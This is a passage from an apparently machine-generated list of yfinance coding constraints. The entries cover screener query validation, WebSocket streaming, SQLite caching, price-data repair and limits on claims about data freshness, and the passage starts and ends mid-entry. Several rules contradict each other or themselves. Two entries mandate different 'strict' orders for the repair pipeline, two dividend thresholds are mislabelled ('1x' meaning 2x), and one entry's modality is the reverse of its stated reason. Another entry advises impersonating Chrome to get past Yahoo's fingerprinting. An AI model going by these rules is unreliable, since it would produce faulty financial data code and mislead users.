    action: extract nested 'raw' values from Yahoo API response dictionaries for market cap, market weight, and employee count
    severity: high
    kind: domain_rule
    modality: must
    consequence: Returning nested dictionary structures instead of raw numeric values breaks downstream numerical analysis
      and comparison operations
    stage_ids:
    - domain_entities
  - id: finance-C-111
    when: When initializing a QueryBase subclass
    action: provide a non-empty list operand and valid operator type
    severity: high
    kind: domain_rule
    modality: must
    consequence: Empty operand list or invalid operator causes ValueError/TypeError, breaking query construction before any
      API call
    stage_ids:
    - screener
  - id: finance-C-112
    when: When using EQ operator in a query
    action: 'provide exactly 2 operands: a valid field name and a value'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Wrong operand count for EQ causes ValueError, preventing the query from being built correctly
    stage_ids:
    - screener
  - id: finance-C-113
    when: When using BTWN operator in a query
    action: 'provide exactly 3 operands: field name and two numeric bounds'
    severity: high
    kind: domain_rule
    modality: must
    consequence: BTWN with wrong operand count or non-numeric bounds causes ValueError/TypeError
    stage_ids:
    - screener
  - id: finance-C-115
    when: When validating query field names
    action: verify field names exist in the query class's valid_fields
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid field names cause ValueError and the query fails before API call
    stage_ids:
    - screener
  - id: finance-C-116
    when: When validating EQ and IS-IN operator values
    action: verify values match allowed values for fields in valid_values
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid values for restricted fields cause ValueError, preventing query execution
    stage_ids:
    - screener
  - id: finance-C-117
    when: When requesting screener results from Yahoo
    action: request more than 250 results per query
    severity: high
    kind: resource_boundary
    modality: must_not
    consequence: 'count or size exceeding 250 causes ValueError: Yahoo limits query count to 250'
    stage_ids:
    - screener
  - id: finance-C-118
    when: When calling screen() function
    action: pass either a predefined query string or a QueryBase subclass instance
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Invalid query type causes ValueError, query is rejected before API call
    stage_ids:
    - screener
  - id: finance-C-119
    when: When using different query classes
    action: use EquityQuery for stocks, FundQuery for mutual funds, ETFQuery for ETFs
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Wrong query class causes validation errors as each class has different valid_fields and valid_values
    stage_ids:
    - screener
  - id: finance-C-120
    when: When composing AND/OR logical operators
    action: provide more than 1 QueryBase operand of the same type
    severity: high
    kind: domain_rule
    modality: must
    consequence: AND/OR with single operand or mixed types causes ValueError/TypeError
    stage_ids:
    - screener
  - id: finance-C-121
    when: When using GT/LT operators
    action: 'provide exactly 2 operands: valid field name and a numeric value'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Wrong operand count or non-numeric comparison value causes validation error
    stage_ids:
    - screener
  - id: finance-C-122
    when: When fetching screener data from Yahoo Finance API
    action: expect real-time data or claim real-time capability
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Yahoo Finance API data has approximately 15-minute delay; presenting it as real-time would be misleading
    stage_ids:
    - screener
  - id: finance-C-123
    when: When presenting screener results
    action: claim Yahoo affiliation or endorsement
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: README explicitly states yfinance is not affiliated with Yahoo, Inc.; claiming otherwise violates legal disclaimers
    stage_ids:
    - screener
  - id: finance-C-124
    when: When using IS-IN operator
    action: 'provide at least 2 operands: field name and one or more values'
    severity: high
    kind: domain_rule
    modality: must
    consequence: IS-IN with fewer than 2 operands causes ValueError
    stage_ids:
    - screener
  - id: finance-C-125
    when: When decoding WebSocket base64 messages
    action: Handle invalid base64 input gracefully and return error structure
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid base64 messages cause unhandled exceptions that crash the message listener loop, disrupting continuous
      price streaming
    stage_ids:
    - live_streaming
  - id: finance-C-126
    when: When implementing async message handler
    action: Detect coroutine functions using asyncio.iscoroutinefunction() and await appropriately
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Non-awaited coroutine functions cause silent failures where message handler logic never executes, leading
      to missing price updates
    stage_ids:
    - live_streaming
  - id: finance-C-127
    when: When subscribing to WebSocket symbols
    action: Normalize string symbol to list before updating subscription set
    severity: high
    kind: domain_rule
    modality: must
    consequence: String symbols processed as iterable characters cause incorrect subscription state and failed message delivery
    stage_ids:
    - live_streaming
  - id: finance-C-128
    when: When using AsyncWebSocket in Jupyter notebook
    action: Apply nest_asyncio.apply() before running async operations
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Nested event loop errors prevent async WebSocket operations from executing, blocking all price streaming
    stage_ids:
    - live_streaming
  - id: finance-C-131
    when: When relying on WebSocket for live price data
    action: Claim the data is actual real-time unfiltered market data
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Presenting Yahoo Finance WebSocket data as true real-time violates Yahoo's terms of use and misleads users
      about data freshness
    stage_ids:
    - live_streaming
  - id: finance-C-132
    when: When using WebSocket streaming data for trading decisions
    action: Present streaming prices as suitable for automated trading execution
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: WebSocket data lacks the reliability guarantees and latency specifications required for production trading
      systems
    stage_ids:
    - live_streaming
  - id: finance-C-133
    when: When configuring WebSocket heartbeat interval
    action: Set subscription re-send interval to 15 seconds to maintain server connection
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Without periodic subscription refresh, the Yahoo Finance WebSocket server closes the connection after approximately
      15-30 seconds of inactivity
    stage_ids:
    - live_streaming
  - id: finance-C-134
    when: When handling WebSocket connection failures
    action: Implement automatic reconnection with exponential backoff delay
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Connection drops without reconnection logic permanently terminate streaming, requiring manual intervention
      to resume
    stage_ids:
    - live_streaming
  - id: finance-C-135
    when: When using default WebSocket URL
    action: Assume the Yahoo Finance streaming endpoint is available 24/7
    severity: medium
    kind: resource_boundary
    modality: must_not
    consequence: The wss://streamer.finance.yahoo.com endpoint only operates during market hours, causing connection failures
      outside trading sessions
    stage_ids:
    - live_streaming
  - id: finance-C-136
    when: When processing Protocol Buffer messages
    action: Use MessageToDict with preserving_proto_field_name for consistent field names
    severity: high
    kind: domain_rule
    modality: must
    consequence: Inconsistent field naming between camelCase and snake_case causes downstream code failures when parsing price
      data
    stage_ids:
    - live_streaming
  - id: finance-C-137
    when: When using debug.hide_exceptions configuration
    action: Suppress critical WebSocket errors that indicate connection instability
    severity: medium
    kind: operational_lesson
    modality: must_not
    consequence: Hidden exceptions prevent users from diagnosing intermittent connection failures, leading to prolonged data
      gaps
    stage_ids:
    - live_streaming
  - id: finance-C-139
    when: When believing WebSocket will auto-reconnect synchronously
    action: Assume synchronous WebSocket automatically retries after connection drops
    severity: high
    kind: rationalization_guard
    modality: must_not
    consequence: Synchronous WebSocket listen() exits on exception without reconnection, leaving applications without price
      updates until manual restart
    stage_ids:
    - live_streaming
  - id: finance-C-142
    when: When creating SQLite database instances
    action: set pragmas for journal_mode=wal and cache_size=-64
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Without WAL mode, SQLite defaults to DELETE journal causing slower concurrent access. Without negative cache_size,
      default 2MB cache may cause disk thrashing
    stage_ids:
    - caching
  - id: finance-C-143
    when: When registering atexit handlers for database cleanup
    action: wrap database close calls in try-except to suppress errors
    severity: low
    kind: domain_rule
    modality: must
    consequence: Python shutdown sequence can cause exceptions during cleanup, leading to traceback spam on console during
      normal program exit
    stage_ids:
    - caching
  - id: finance-C-144
    when: When implementing multi-threaded cache access
    action: use Lock to protect cache initialization from race conditions
    severity: high
    kind: domain_rule
    modality: must
    consequence: Multiple threads could simultaneously initialize cache, creating duplicate database connections or raising
      database locking errors
    stage_ids:
    - caching
  - id: finance-C-145
    when: When handling peewee.OperationalError during table creation
    action: fallback to without_rowid=False when WITHOUT ROWID is unsupported
    severity: high
    kind: domain_rule
    modality: must
    consequence: Table creation fails entirely if SQLite version doesn't support WITHOUT ROWID, causing cache to be completely
      unavailable
    stage_ids:
    - caching
  - id: finance-C-146
    when: When validating cached timezone values
    action: use is_valid_timezone() to verify timezone string before storing
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid timezone strings stored in cache would cause datetime conversion errors during all subsequent price
      history processing
    stage_ids:
    - caching
  - id: finance-C-147
    when: When handling cached cookie expiry
    action: compare cookie expiry timestamp against current UTC time before use
    severity: high
    kind: domain_rule
    modality: must
    consequence: Expired cookies used for Yahoo API requests would cause authentication failures and data fetch errors
    stage_ids:
    - caching
  - id: finance-C-148
    when: When implementing SQLite-based caching
    action: claim cache provides real-time or guaranteed-consistency data
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Cached timezone or ISIN data may be stale, and SQLite integrity depends on clean process shutdown. Presenting
      cache as real-time would mislead users about data freshness
    stage_ids:
    - caching
  - id: finance-C-149
    when: When using platformdirs user cache directory
    action: assume default cache location is always writable
    severity: high
    kind: resource_boundary
    modality: must_not
    consequence: On systems with restricted user directories or in containerized environments, the default cache path may
      be read-only, causing cache initialization to fail silently
    stage_ids:
    - caching
  - id: finance-C-150
    when: When cleaning up stale ISIN cache entries
    action: delete entries older than 1 week with same ticker value
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Stale ISIN mappings for delisted/reorganized securities would persist indefinitely, causing ticker resolution
      to return incorrect symbols
    stage_ids:
    - caching
  - id: finance-C-151
    when: When migrating from legacy CSV cache format
    action: remove old CSV cache file after SQLite migration
    severity: low
    kind: operational_lesson
    modality: must
    consequence: Legacy CSV file would persist on disk causing confusion about which data source is authoritative, and could
      be re-read by older code versions
    stage_ids:
    - caching
  - id: finance-C-152
    when: When using pickle for cookie serialization
    action: use pickle.HIGHEST_PROTOCOL for cross-python-version compatibility
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: Lower pickle protocol versions may not deserialize correctly across Python versions, causing cached cookies
      to fail silently
    stage_ids:
    - caching
  - id: finance-C-153
    when: When handling IntegrityError during cache store
    action: update existing record instead of raising when key already exists
    severity: high
    kind: domain_rule
    modality: must
    consequence: Duplicate key constraint violation would cause cache write to fail, leaving stale data in cache and preventing
      updates for changed values
    stage_ids:
    - caching
  - id: finance-C-154
    when: When implementing ISODateTimeField for SQLite datetime
    action: validate datetime format on both read and write operations
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid datetime strings from corrupted cache would cause ValueError during deserialization, crashing the
      application
    stage_ids:
    - caching
  - id: finance-C-156
    when: When configuring session for Yahoo Finance API
    action: Set session to impersonate='chrome' to satisfy Yahoo's browser fingerprinting requirements
    severity: high
    kind: resource_boundary
    modality: must
    consequence: API requests will be blocked or rate-limited by Yahoo if not impersonating a known browser
  - id: finance-C-157
    when: When transferring session configuration to HTTP layer
    action: Pass singleton YfData instance to each data-fetching stages (price_history, quote_analysis, domain_entities, screener)
      for shared cookie/crumb management
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Each stage will create separate sessions, causing cookie/crumb inconsistency and API authentication failures
  - id: finance-C-158
    when: When passing ticker symbols to ticker_facade
    action: Convert ticker to uppercase string before passing, or use (symbol, MIC) tuple format for non-default exchanges
    severity: high
    kind: domain_rule
    modality: must
    consequence: Lowercase ticker symbols will not match Yahoo Finance's uppercase symbol database, causing data fetch failures
  - id: finance-C-159
    when: When looking up timezone for a ticker
    action: Cache timezone in _TzCache using SQLite before passing to price_history to avoid repeated API fetches
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Without caching, each ticker requires an additional API round-trip for timezone lookup, significantly degrading
      batch download performance
  - id: finance-C-160
    when: When passing timezone from ticker_facade to price_history
    action: Pass validated timezone string (pytz-compatible) or None, not invalid timezone values
    severity: high
    kind: domain_rule
    modality: must
    consequence: Invalid timezone will cause tz_localize/tz_convert failures in price_history, corrupting all timestamp handling
  - id: finance-C-161
    when: When processing price history with tag=-1 sentinels
    action: Reconstruct missing price/volume values using finer-grained interval data before returning repaired DataFrame
    severity: high
    kind: domain_rule
    modality: must
    consequence: Price gaps with tag=-1 will propagate as invalid values, corrupting financial calculations and backtesting
      results
  - id: finance-C-162
    when: When repairing Yahoo price data
    action: 'Execute repair pipeline in strict order: bad_dividend_adjust → currency_standardize → unit_mixups → bad_stock_splits
      → zeroes → capital_gains'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Out-of-order repairs will compound errors, leading to incorrect adjusted close values and flawed backtesting
  - id: finance-C-163
    when: When batch downloading multiple tickers
    action: Acquire shared._LOCK before accessing shared._DFS for thread-safe multi-ticker download
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Concurrent access to shared._DFS without lock causes race conditions, resulting in data overwrites and missing
      tickers
  - id: finance-C-164
    when: When combining DataFrames from multiple tickers
    action: Use MultiIndex with ['Ticker', 'Price'] levels for column names to preserve per-ticker column structure
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without MultiIndex, columns from different tickers will be misaligned, corrupting multi-ticker analysis
  - id: finance-C-165
    when: When handling timezone-aware DataFrames from batch download
    action: Use ignore_tz=True for daily+ intervals (tz-naive concatenation) and ignore_tz=False for intraday intervals (preserve
      timezone)
    severity: medium
    kind: domain_rule
    modality: should
    consequence: Mixed timezone DataFrames without proper ignore_tz setting cause timestamp misalignment across tickers
  - id: finance-C-166
    when: When storing cookies for session persistence
    action: Serialize cookie jar to _CookieCache with pickle before passing to caching layer
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Without cookie caching, each ticker download requires fresh cookie acquisition, increasing API latency and
      rate-limit risk
  - id: finance-C-167
    when: When loading cached cookies
    action: Check cookie expiry timestamp before loading from cache; discard expired cookies
    severity: high
    kind: domain_rule
    modality: must
    consequence: Expired cookies cause API authentication failures, resulting in empty data responses
  - id: finance-C-168
    when: When fetching quote/financial data via quote_analysis
    action: Convert raw JSON response to structured dict/DataFrame before passing to ticker_facade property accessors
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Unstructured JSON will cause attribute errors when user code accesses Ticker.info, .recommendations, etc.
  - id: finance-C-169
    when: When processing earnings trend data
    action: Extract 'raw' values from nested dict structure before returning DataFrame to ticker_facade
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Nested dict values instead of raw numbers cause type errors in downstream financial calculations
  - id: finance-C-170
    when: When screening for tickers via screener
    action: Limit result count to maximum 250 per Yahoo API constraint
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Requests exceeding 250 results are rejected by Yahoo API, causing ValueError exceptions
  - id: finance-C-171
    when: When streaming real-time prices via WebSocket
    action: Decode base64-encoded protobuf message before passing dict to user callback
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Raw base64 strings passed to callback cause type errors in user trading logic
  - id: finance-C-172
    when: When parsing financial time series data
    action: Convert Unix timestamps to pandas DatetimeIndex with UTC localization before DataFrame construction
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Unconverted Unix timestamps cause index misalignment in financial time series analysis
  - id: finance-C-173
    when: When handling domain entity data (sector/industry)
    action: Parse API response with _parse_and_assign_common() to extract name, symbol, overview before accessing properties
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Raw API response without parsing causes AttributeError when accessing sector.name, sector.top_companies,
      etc.
  - id: finance-C-174
    when: When presenting Yahoo Finance data to end users
    action: Present data as official Yahoo Finance data or guarantee real-time accuracy (Yahoo has 15-minute delay)
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Misrepresenting delayed data as real-time violates Yahoo terms of use and misleads users in trading decisions
  - id: finance-C-175
    when: When describing yfinance's real-time capabilities
    action: Claim true real-time streaming capability for WebSocket (it's still polling-based with subscription mechanism)
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Overstating real-time nature may lead users to make trading decisions based on stale data assumptions
  - id: finance-C-176
    when: When handling Volume column in price history
    action: Fill NaN volumes with 0 and cast to np.int64 before returning DataFrame
    severity: medium
    kind: domain_rule
    modality: must
    consequence: NaN volumes cause dtype object instead of int64, breaking numerical operations and causing comparison errors
  - id: finance-C-177
    when: When dropping columns from price history
    action: Use errors='ignore' parameter to handle optional columns (Dividends, Stock Splits, Capital Gains) gracefully
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Missing optional columns without errors='ignore' raises KeyError, breaking backward compatibility
  - id: finance-C-178
    when: When resampling price intervals
    action: Apply 'left' label and 'left' closed when resampling to maintain temporal alignment with source data
    severity: high
    kind: domain_rule
    modality: must
    consequence: Wrong resample boundaries cause timestamp misalignment, corrupting multi-interval analysis
  - id: finance-C-179
    when: When limiting ticker download requests
    action: Cap thread count to min([ticker_count, cpu_count * 2]) to prevent Yahoo rate limiting
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Unlimited parallel downloads trigger Yahoo rate limiting, causing 429 errors and data fetch failures
  - id: finance-C-180
    when: When caching financial data across stages
    action: Use lru_cache_freezeargs decorator for functions accepting dict/list arguments to enable proper memoization
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Without frozen arguments, lru_cache cannot hash mutable dict/list parameters, causing repeated API calls
  - id: finance-C-181
    when: When handling ISIN-to-ticker resolution
    action: Store resolved ticker in ISIN cache before returning ticker symbol to user code
    severity: low
    kind: architecture_guardrail
    modality: must
    consequence: Repeated ISIN lookups without caching cause unnecessary API round-trips
  - id: finance-C-182
    when: When repairing intraday intervals
    action: Limit reconstruction depth to 2 levels (e.g., 1d→1h→30m) to prevent infinite recursion
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Unlimited reconstruction depth causes excessive API calls and memory exhaustion
  - id: finance-C-183
    when: When removing duplicate index entries
    action: Keep 'last' duplicate when deduplicating DataFrame index after batch download
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Keeping first duplicate loses most recent price data, corrupting time-series continuity
  - id: finance-C-184
    when: When combining OHLCV with dividend/split events
    action: Set Stock Splits=0 to 1 before resampling to avoid zero-multiplier issues
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Zero stock splits cause price calculations to fail, resulting in incorrect adjusted prices
  - id: finance-C-185
    when: When initializing a Ticker object with a ticker symbol
    action: Uppercase the ticker symbol to verify consistent lookup behavior
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Inconsistent ticker symbol casing causes Yahoo API lookup failures or returns incorrect data for mixed-case
      symbols
  - id: finance-C-186
    when: When processing price history data returned from Yahoo Finance
    action: Verify each returned DataFrames use timezone-aware DatetimeIndex
    severity: high
    kind: domain_rule
    modality: must
    consequence: Timezone-naive DataFrames cause incorrect temporal alignment when combining data from multiple tickers or
      performing time-based operations
  - id: finance-C-187
    when: When fetching data from Yahoo Finance API for historical price data
    action: Treat returned data as delayed by at least 15-30 minutes - this is NOT real-time data
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Systems claiming or relying on yfinance data as true real-time feed will experience incorrect trading signals
      in time-sensitive applications, leading to suboptimal execution prices or missed opportunities
  - id: finance-C-190
    when: When presenting or reporting yfinance data capabilities to users
    action: Represent data as suitable for production trading systems where data accuracy is mission-critical
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Users deploy yfinance in live trading systems expecting guaranteed data integrity, but Yahoo API data can
      have gaps, delays, or corrections that cause incorrect trades and financial losses
  - id: finance-C-191
    when: When using yfinance WebSocket streaming for real-time data
    action: Recognize that the WebSocket uses a 15-second heartbeat subscription interval and is best-effort
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Applications expecting sub-second latency or guaranteed message delivery will experience missed updates and
      stale prices during network interruptions
  - id: finance-C-192
    when: When making HTTP requests to Yahoo Finance API
    action: Implement retry logic for transient errors (timeout, connection errors) as defined in config.network.retries
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without retry logic, transient network failures cause immediate data fetch failures, breaking downstream
      pipelines
  - id: finance-C-193
    when: When the Yahoo Finance API rate limits requests
    action: Propagate YFRateLimitError to caller and do NOT silently retry within the same request cycle
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Silently retrying after rate limit triggers account-level IP bans from Yahoo, causing complete data access
      loss
  - id: finance-C-194
    when: When repairing price data using the repair pipeline
    action: 'Execute repair steps in strict order: standardize_currency → div_adjust → unit_mixups → stock_splits → capital_gains
      → auto_adjust'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Skipping or reordering repair steps causes incorrect adjusted prices, especially for ETFs and mutual funds
      where capital gains processing affects the final adjusted close calculation
  - id: finance-C-195
    when: When using yfinance data for backtesting trading strategies
    action: Present backtested results as proof of expected live trading performance
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Backtest results ignore market impact, slippage, financing costs, and execution delays. Users allocate capital
      based on inflated backtest returns, leading to severe underperformance in live trading
  - id: finance-C-196
    when: When accessing FX ticker data (tickers with =X suffix)
    action: Expect volume column to always be 0 - FX data does not include volume information
    severity: low
    kind: resource_boundary
    modality: must
    consequence: Code expecting non-zero volume for FX tickers will produce incorrect technical indicators or trading signals
      based on zero-volume data
  - id: finance-C-197
    when: When running backtests or any stochastic strategy simulations
    action: Assume the framework sets random seeds consistently across runs — the framework does not implement full random
      seed coverage, leading to non-reproducible results between executions
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Without random seed control, backtest results vary between runs due to stochastic elements in data sampling,
      split decisions, or Monte Carlo simulations, making it impossible to verify strategy performance or compare parameter
      changes
    derived_from_bd_id: BD-GAP-006
  - id: finance-C-198
    when: When implementing backtest reproducibility features
    action: Set random.seed() with explicit seed value at the start of each backtest run and document each stochastic operations
      that require seeding (data sampling, Monte Carlo, split decisions)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Missing random seed coverage causes backtest results to be non-reproducible, preventing proper strategy validation
      and parameter comparison across runs
    derived_from_bd_id: BD-GAP-006
  - id: finance-C-199
    when: When implementing real-time streaming functionality in backtesting
    action: Maintain separate synchronous and asynchronous class implementations for WebSocket connections — do not merge
      AsyncWebSocket and WebSocket classes into a single implementation
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Mixing async and sync event loops in Python causes runtime errors or deadlocks; consolidated classes would
      force async patterns on synchronous users or vice versa, breaking the streaming functionality entirely
    derived_from_bd_id: BD-021
  - id: finance-C-200
    when: When validating dividend repairs where repaired value is greater than original
    action: Apply a 1x improvement threshold — only flag dividends as too-small when the repaired dividend is at least double
      (2x) the original reported amount
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Using a lower threshold (e.g., 0.5x) over-corrects rounding errors, inflating historical dividend yields
      and causing backtests to show higher returns than actual historical performance
    derived_from_bd_id: BD-029
  - id: finance-C-201
    when: When validating dividend repairs where repaired value is less than original
    action: Apply a 2x improvement threshold — only flag dividends as too-big when the corrected dividend is at most half
      (0.5x) the original reported amount
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Using a lower threshold (e.g., 1.5x) risks false positives from legitimate dividend reductions, distorting
      historical dividend data and causing incorrect portfolio analytics
    derived_from_bd_id: BD-030
  - id: finance-C-202
    when: When validating dividend adjustments by comparing pre-dividend price baselines
    action: Use a 14-day lookback window prior to the ex-dividend date to establish the pre-dividend price baseline
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Using a shorter lookback (e.g., 5 days) includes noisy daily fluctuations causing incorrect adjustment validation;
      using a longer lookback (e.g., 30 days) risks mixing different market regimes, leading to unreliable dividend adjustment
      estimates
    derived_from_bd_id: BD-031
  - id: finance-C-203
    when: When performing comparative analysis across yfinance APIs (download vs Ticker.history)
    action: Explicitly set actions parameter to verify consistent dividend/split handling — do not rely on default values
      as download() defaults to actions=False while Ticker.history() defaults to actions=True
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: API inconsistency means batch downloads omit dividends and splits by default while single-ticker access includes
      them, causing portfolio analytics and backtests to show materially different results for the same underlying data
    derived_from_bd_id: BD-042
  - id: finance-C-204
    when: When debugging missing dividends or splits in historical data
    action: Temporarily disable hide_exceptions=True to reveal silent failures — check that actions parameter is explicitly
      set and matches expectations before investigating further
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Silent failure mechanism combined with API inconsistency (download() vs Ticker.history()) means users receive
      incomplete dividend data without any error indication, propagating incorrect financial data into backtests and analytics
    derived_from_bd_id: BD-045
  - id: finance-C-205
    when: When diagnosing failures in historical data retrieval
    action: Temporarily disable each silent failure modes (config hide_exceptions=False, debug hide_exceptions=False) to reveal
      the full failure cascade before attempting fixes
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Risk cascade from multiple silent failure modes means multiple failure types can occur simultaneously without
      notification — config errors, debug errors, and API inconsistencies all masked, making debugging nearly impossible
    derived_from_bd_id: BD-047
  - id: finance-C-206
    when: When implementing live streaming message handlers for financial data
    action: Consider implementing structured message context (timestamp, source, sequence_number) if message ordering, latency
      tracking, or multi-source correlation is needed — simple single-parameter callbacks may not provide sufficient metadata
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Simple single-parameter callbacks lack metadata for traceability, making it impossible to correlate messages
      across sources, detect sequence gaps, or measure latency — issues accumulate silently in high-frequency streaming scenarios
    derived_from_bd_id: BD-GAP-002
  - id: finance-C-207
    when: When configuring yfinance for production trading or automated backtesting
    action: Enable debug.logging=True when using the default hide_exceptions=True setting to detect silent failures; periodically
      test with hide_exceptions=False to verify data completeness
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Silent failures from debug.hide_exceptions=True mask configuration errors, invalid API keys, and upstream
      provider changes; without debug.logging enabled, users remain unaware that some ticker downloads are failing, corrupting
      backtest results
    derived_from_bd_id: debug.hide_exceptions=True by default
  - id: finance-C-208
    when: When using the SECTOR_INDUSTRY_MAPPING constant for sector/industry classification in backtesting or screening
    action: Verify that the hardcoded sector/industry mapping in const.py is current and accurate for the target market and
      time period; stale mappings may cause incorrect sector filtering
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Hardcoded sector mappings may become outdated due to company reclassifications, index reconstitution, or
      market structure changes; stale mappings cause incorrect sector-based filtering, leading to wrong portfolio composition
      in backtesting
    derived_from_bd_id: BD-018
  - id: finance-C-209
    when: When implementing multi-interval price reconstruction or price repair algorithms
    action: Limit reconstruction/repair depth to max_depth=2 (maximum 2 levels of iteration); exceeding this threshold indicates
      potential algorithmic instability
    severity: high
    kind: domain_rule
    modality: must
    consequence: Exceeding max_depth=2 in price repair/reconstruction may cause infinite loops or exponential computation;
      the algorithm was designed with depth=2 as the safe boundary for handling price gaps and errors
    derived_from_bd_id: BD-049
  - id: finance-C-210
    when: When modifying reconstruction depth parameters in multi-interval logic or price repair logic
    action: Verify any change to max_depth in interval reconstruction is mirrored to price repair depth and vice versa; maintain
      consistency across both contexts (BD-006 and BD-035 must have matching depth limits)
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Modifying depth limits in one context without updating the other creates hidden inconsistency where price
      repair and interval reconstruction operate at different depths for equivalent transformations, causing unexpected behavior
      in edge cases
    derived_from_bd_id: BD-049
  - id: finance-C-211
    when: When implementing FastInfo metadata fetching in backtesting frameworks using yfinance
    action: Fetch price history lazily (only when needed for calculated metadata like 50-day average); avoid loading full
      history for static metadata queries to prevent unnecessary API calls and performance degradation
    severity: high
    kind: domain_rule
    modality: must
    consequence: Eager fetching of price history for simple metadata queries causes unnecessary API calls and network latency;
      in backtesting scenarios with many symbols, this creates significant performance overhead and rate limiting issues
    derived_from_bd_id: BD-010
  - id: finance-C-212
    when: When implementing or refactoring data repair logic for multiday intervals (1wk, 1mo, 3mo) in backtesting
    action: Maintain the auto-fetch-and-resample behavior when repair=True with multiday intervals — do not optimize away
      the daily data fetch and resampling step, as this is required for accurate dividend adjustment on Yahoo historical data
    severity: high
    kind: domain_rule
    modality: must
    consequence: Removing the auto-fetch-and-resample logic causes incorrect dividend adjustments on weekly/monthly data,
      leading to materially wrong portfolio analytics for long-term investors who rely on accurate adjusted price calculations
    derived_from_bd_id: BD-039
  - id: finance-C-213
    when: When depending on production reliability for this data source in backtesting
    action: Assume this capability is available — the gap indicates this functionality is missing and only 22% coverage (4/18
      applicable scenarios) exists
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Relying on an unimplemented capability causes production failures when the 78% of uncovered applicable scenarios
      are encountered, leading to backtest interruptions and potential data gaps
    derived_from_bd_id: BD-GAP-007
  - id: finance-C-214
    when: When addressing the production reliability gap in backtesting
    action: Implement coverage for additional applicable scenarios to increase from 22% (4/18) toward 100% coverage, prioritizing
      scenarios with highest frequency of occurrence in production workloads
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without expanding coverage, production workloads encounter uncovered scenarios causing failures, leading
      to backtest interruptions and unreliable strategy validation results
    derived_from_bd_id: BD-GAP-007
  - id: finance-C-215
    when: When implementing or configuring auto_adjust mode for price adjustment in backtesting
    action: Use linear ratio adjustment (unadjusted_close / adjusted_close) to scale historical prices — verify the adjustment
      algorithm applies cumulative ratio scaling rather than logarithmic or percentage-based approaches
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using non-linear adjustment (logarithmic or percentage-based) causes incorrect price scaling that distorts
      historical price relationships, leading to wrong signal generation and strategy performance metrics
    derived_from_bd_id: BD-032
  - id: finance-C-216
    when: When using backward adjustment for historical prices in backtesting
    action: Verify that historical prices are interpreted as original levels observed at that time, not as forward-adjusted
      values — verify the most recent price represents true unadjusted market value
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Misinterpreting backward-adjusted prices as forward-adjusted causes confusion about historical portfolio
      values and risk metrics, leading to incorrect investment decisions based on misunderstood historical performance
    derived_from_bd_id: BD-033
  - id: finance-C-217
    when: When implementing or configuring phantom dividend detection in backtesting
    action: Apply the 1.5x threshold — flag any dividend as potentially phantom when price_drop > 1.5 * dividend_amount —
      do not tighten below 1.2x or loosen above 2.0x without documented justification
    severity: high
    kind: domain_rule
    modality: must
    consequence: 'Using incorrect threshold values causes phantom dividend misdetection: too tight (1.2x) increases false
      positives from volatility; too loose (2.0x) misses subtle phantom dividend patterns, corrupting historical price data'
    derived_from_bd_id: BD-034
  - id: finance-C-218
    when: When implementing or modifying the price repair pipeline ordering or stage sequence
    action: Document and preserve the mandated pipeline execution order (standardize_currency → div_adjust → unit_mixups →
